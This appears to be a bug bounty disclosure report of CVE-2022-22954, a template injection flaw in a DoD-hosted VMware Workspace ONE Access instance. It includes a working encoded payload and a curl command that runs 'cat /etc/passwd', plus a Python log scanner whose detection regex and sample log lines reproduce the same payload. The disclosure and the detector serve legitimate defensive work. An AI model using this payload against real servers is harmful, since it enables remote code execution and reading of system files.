███ vulnerable to CVE-2022-22954
Critical
## Vulnerability Details
I found that one of the targets belonging to DOD is vulnerable to CVE-2022-22954, where an attacker may be able to execute any malicious code, such as escalating privileges; remote code execution is also possible.
**Technical Summary:**
CVE-2022-22954 is a server-side template injection vulnerability in the VMware Workspace ONE Access and Identity Manager. This vulnerability was assigned a CVSSv3 score of 9.8. An unauthenticated attacker with network access could exploit this vulnerability by sending a specially crafted request to a vulnerable VMware Workspace ONE or Identity Manager. Successful exploitation could result in remote code execution by exploiting a server-side template injection flaw.
**Vulnerable URL:**
███=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%22%29%7d
## Impact
The impact of server-side template injection vulnerabilities is generally critical: successful exploitation typically yields remote code execution and full control of the back-end server. Even without code execution, the attacker may be able to read sensitive data on the server.
## System Host(s)
██████, ████
## Affected Product(s) and Version(s)
VMware Workspace ONE Access
## CVE Numbers
CVE-2022-22954
## Steps to Reproduce
* Run the following curl command
**Command Used:**
```
curl -sk -X GET -H "Host: ██████" "█████████=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%22%29%7d"
```
**Response:**
```
<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/html">
<head>
<title>Error Page</title>
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<link rel="stylesheet" type="text/css" href="/catalog-portal/css/errorpage.css">
</head>
<body>
<div class="error-container">
<div class="error-img-container">
<img src="/catalog-portal/app/graphics/warning.svg" class="warning-icon">
</div>
<div class="error-text-heading">Request Failed</div>
<div class="error-text-container">
<p>Please contact your IT Administrator.</p>
<a href="/catalog-portal/ui/logout?error=&deviceUdid=$%7B%22freemarker.template.utility.Execute%22?new()(%22cat%20/etc/passwd%22)%7D">Sign Out</a>
</div>
</div>
</body>
<script>
if(console && console.log) {
console.log("auth.context.invalid");
console.log("Authorization context is not valid. Login request received with tenant code: uhhz-lbr-004v, device id: █████;
}
</script>
</html>
```
* As you can see in the response above, it contains the output of /etc/passwd.
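For defenders reviewing access logs of a Workspace ONE Access instance, the following is an added detection example (not code from the report, from HackerOne, or from VMware): it URL-decodes each query parameter of every request and flags FreeMarker template expressions of the shape used in the report's payload. The log lines, client addresses and the `example-endpoint` path are constructed for this example.

```python
"""Added detection example, not code from the report or from VMware: flag
access-log requests whose query string carries a FreeMarker expression of the
shape used against CVE-2022-22954. Log lines, IPs and paths are constructed."""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Request field of a combined-format access log: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# ${...} whose body reaches a FreeMarker utility class or calls ?new(),
# which is how the reported payload instantiates freemarker...Execute.
SSTI_RE = re.compile(r"\$\{.*?(freemarker\.template\.utility|\?new\()", re.I | re.S)

def full_decode(value: str, max_rounds: int = 3) -> str:
    """URL-decode until the text stops changing (catches double encoding)."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def scan_line(line: str):
    """Return a finding dict for one log line, or None if it looks clean."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    for name, raw in parse_qsl(parts.query, keep_blank_values=True):
        decoded = full_decode(raw)
        if SSTI_RE.search(decoded):
            return {"path": parts.path, "param": name, "decoded": decoded}
    return None

def scan_access_log(lines):
    """Scan many lines; return the findings in log order."""
    return [f for f in map(scan_line, lines) if f]

# Constructed sample log: a benign logout, two SSTI probes (fully hex-encoded
# as in the report, and mixed-encoded as reflected in the error page's
# Sign Out link), and an unrelated POST.
SAMPLE_LOG = [
    '10.0.0.5 - - [06/Apr/2022:12:00:01 +0000] "GET /catalog-portal/ui/logout?error=&deviceUdid=a1b2c3 HTTP/1.1" 302 0',
    '203.0.113.9 - - [06/Apr/2022:12:00:02 +0000] "GET /catalog-portal/ui/example-endpoint?error=&deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%22%29%7d HTTP/1.1" 400 1532',
    '203.0.113.9 - - [06/Apr/2022:12:00:03 +0000] "GET /catalog-portal/ui/example-endpoint?error=&deviceUdid=$%7B%22freemarker.template.utility.Execute%22?new()(%22cat%20/etc/passwd%22)%7D HTTP/1.1" 400 1532',
    '198.51.100.7 - - [06/Apr/2022:12:00:04 +0000] "POST /catalog-portal/ui/example-login HTTP/1.1" 200 812',
]
```

Running `scan_access_log(SAMPLE_LOG)` reports the two probe lines with the same decoded expression, showing that the fully hex-encoded and the mixed-encoded forms normalise to one indicator.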
## Suggested Mitigation/Remediation Actions
Upgrade the affected instances to the latest patched version.
Report Stats
- Report ID: 1537694
- State: Closed
- Substate: resolved
- Upvotes: 4